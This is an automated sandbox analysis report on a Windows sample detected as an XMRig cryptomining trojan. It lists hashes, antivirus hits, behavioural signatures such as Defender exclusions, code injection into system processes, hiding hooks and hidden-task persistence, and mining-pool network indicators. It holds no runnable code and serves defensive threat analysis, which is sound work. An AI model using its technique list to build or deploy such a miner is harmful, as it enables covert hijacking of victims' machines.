Windows Analysis Report
ylVAEHbMLf.exe

Overview

General Information

Sample name: ylVAEHbMLf.exe (renamed because original name is a hash value)
Original sample name: 3fb477ee2214bf2d4ed7df2d23f159e8.exe
Analysis ID: 1528506
MD5: 3fb477ee2214bf2d4ed7df2d23f159e8
SHA1: 836c3f3b4b8f02e495703767b6bf923c453dba36
SHA256: 508821549db3334cccd6d492e17b29343ea5d0bda03379188c083e8c2217c291
Tags: 64, exe, trojan

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Protects its processes via BreakOnTermination flag
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Writes to foreign memory regions
Yara detected PersistenceViaHiddenTask
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection

Source: ylVAEHbMLf.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp Avira: detection malicious, Label: HEUR/AGEN.1362356
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Avira: detection malicious, Label: HEUR/AGEN.1329646
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe ReversingLabs: Detection: 55%
Source: ylVAEHbMLf.exe ReversingLabs: Detection: 55%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Joe Sandbox ML: detected
Source: ylVAEHbMLf.exe Joe Sandbox ML: detected

Bitcoin Miner

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: ylVAEHbMLf.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC64BE3C FindFirstFileExW, 7_2_00000225DC64BE3C
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6ABE3C FindFirstFileExW, 7_2_00000225DC6ABE3C
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AEBE3C FindFirstFileExW, 8_2_00000202C0AEBE3C
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A66130BE3C FindFirstFileExW, 9_2_000002A66130BE3C
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE29BE3C FindFirstFileExW, 10_2_000002BAAE29BE3C
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A879CBE3C FindFirstFileExW, 11_2_0000026A879CBE3C
Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000179537ABE3C FindFirstFileExW, 12_2_00000179537ABE3C
Source: C:\Windows\System32\svchost.exe Code function: 12_2_0000017953D4BE3C FindFirstFileExW, 12_2_0000017953D4BE3C
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D56BE3C FindFirstFileExW, 13_2_000002295D56BE3C
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000025306E6BE3C FindFirstFileExW, 14_2_0000025306E6BE3C
Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001845B3BBE3C FindFirstFileExW, 15_2_000001845B3BBE3C
Source: C:\Windows\System32\svchost.exe Code function: 16_2_000001ADECD4BE3C FindFirstFileExW, 16_2_000001ADECD4BE3C
Source: C:\Windows\System32\svchost.exe Code function: 17_2_000001D55907BE3C FindFirstFileExW, 17_2_000001D55907BE3C
Source: C:\Windows\System32\svchost.exe Code function: 18_2_00000241A9EABE3C FindFirstFileExW, 18_2_00000241A9EABE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C3EBE3C FindFirstFileExW, 21_2_000002152C3EBE3C
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001CD7319BE3C FindFirstFileExW, 24_2_000001CD7319BE3C
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E89BE3C FindFirstFileExW, 26_2_000002824E89BE3C
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E8FBE3C FindFirstFileExW, 26_2_000002824E8FBE3C
Source: C:\Windows\System32\svchost.exe Code function: 27_2_0000021B47B3BE3C FindFirstFileExW, 27_2_0000021B47B3BE3C
Source: Network traffic Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:51734 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49736 -> 45.76.89.70:80
Source: lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: powershell.exe, 00000005.00000002.1819640714.000001FA482FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000005.00000002.1819640714.000001FA482FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micft.cMicRosof
Source: lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000008.00000002.2992018562.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747836677.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 00000008.00000002.2986292449.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000008.00000000.1747836677.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2992018562.00000202C0200000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000008.00000000.1747440586.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2983352269.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000008.00000002.2992018562.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747836677.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.
Source: lsass.exe, 00000008.00000002.2992018562.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747836677.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000012.00000002.2989122565.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FC41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747440586.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2983352269.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FC41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1819526785.000001FA481B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
